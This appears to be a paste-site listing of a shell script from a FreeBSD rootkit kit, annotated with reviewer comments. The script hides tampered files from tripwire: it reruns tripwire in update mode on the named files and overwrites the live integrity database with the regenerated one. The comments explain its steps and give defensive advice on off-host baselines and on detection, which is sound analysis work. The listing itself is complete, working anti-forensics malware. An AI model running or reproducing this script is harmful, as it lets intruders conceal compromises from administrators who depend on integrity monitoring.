FlyFar

Rootkit.FreeBSD.Agent.e - Source Code

Jun 9th, 2023
Bash 1.30 KB | Cybersecurity | 0 0
  1. #!/bin/sh
  2. # Simple script to avoid detection by tripwire. Modify to suit your needs.
     # NOTE(review): anti-forensics helper, kept here for analysis. For each file
     # named on the command line it runs tripwire in update mode and then moves
     # a database file from ./databases over the live one, so the integrity
     # baseline is rewritten after the file has changed and a later check has
     # nothing to report for it.
     # Defender view: a baseline that is writable from the monitored host cannot
     # be trusted after a compromise. Keep it on read-only or off-host media and
     # compare it against an independent copy before relying on a clean report.
  3.  
  4. echo -n "Trying to guess the location of tripwire. . ."
  5.  
     # Look tripwire up on PATH; the operator is prompted below when the result
     # does not pass the executable test.
  6. TRIPWIRE=`which tripwire`
  7.  
  8. if [ ! -x $TRIPWIRE ]; then
  9.     echo "Failed!"
  10.     echo -n "Please enter a full path to tripwire: "
  11.  
  12.     while read TRIPWIRE; do
  13.         if [ -x $TRIPWIRE ]; then
  14.             echo "Ok."
  15.             break
  16.         else
  17.             echo -n "That doesn't exist! Try again: "
  18.         fi
  19.     done
  20. else
  21.     echo "Ok: $TRIPWIRE"
  22. fi
  23.  
  24. echo -n "Trying to guess the location of the tripwire database. . ."
  25.  
     # Hard-coded guess for the database location; the prompt loop below accepts
     # any path that names an existing regular file.
  26. DBPATH="/usr/adm/tcheck/databases/tw.db"
  27.  
  28. if [ ! -f $DBPATH ]; then
  29.     echo "Failed!"
  30.     echo -n "Please enter the name of the database file: "
  31.  
  32.     while read DBPATH; do
  33.         if [ -f $DBPATH ]; then
  34.             echo "Ok."
  35.             break
  36.         else
  37.             echo -n "That doesn't exist! Try again: "
  38.         fi
  39.     done
  40. else
  41.     echo "Ok: $DBPATH"
  42. fi
  43.  
     # Branch on whether the database is read-only. On "y" the database is left
     # alone: the script runs `make tripwire-inst` and `install.sh` with the
     # tripwire path and exits. Neither helper is shown on this page.
     # NOTE(review): presumably they act on the tripwire binary itself; confirm
     # against the full kit. If so, a read-only database is not sufficient on
     # its own and the checker should also be run from trusted media.
     # On "n" control falls through to the update loop further down.
  44. DONE=false
  45. while [ $DONE = "false" ]; do
  46.     DONE=true
  47.     echo -n "Is the database file read-only?[y(n)] "
  48.     read ANSWER
  49.     case $ANSWER in
  50.         [yY] )
  51.             make tripwire-inst
  52.             install.sh $TRIPWIRE
  53.             exit 0 ;;
  54.         [nN] )
  55.             break ;;
  56.         * )
  57.             echo "Yes or No"\!
  58.             DONE=false ;;
  59.     esac
  60. done
  61.  
     # A file under ./databases in the current directory, named after the live
     # database. NOTE(review): the loop below moves this file after each update
     # run, so the script evidently expects tripwire to leave the regenerated
     # database here; verify against the tripwire version in use.
  62. DBFILE=./databases/`basename $DBPATH`
  63.  
     # `for BIN; do` iterates over the script's positional arguments.
     # Detection: tripwire being run with -update outside a planned change, and
     # a rename onto the database path, are both observable host events worth
     # alerting on; a change in the database's hash relative to an off-host copy
     # is the after-the-fact indicator.
  64. for BIN; do
  65.     echo -n "Updating $BIN. . ."
  66.     $TRIPWIRE -update $BIN
  67.     mv $DBFILE $DBPATH
  68.     echo "done."
  69. done
  70.  
  71. echo "All done here chief!"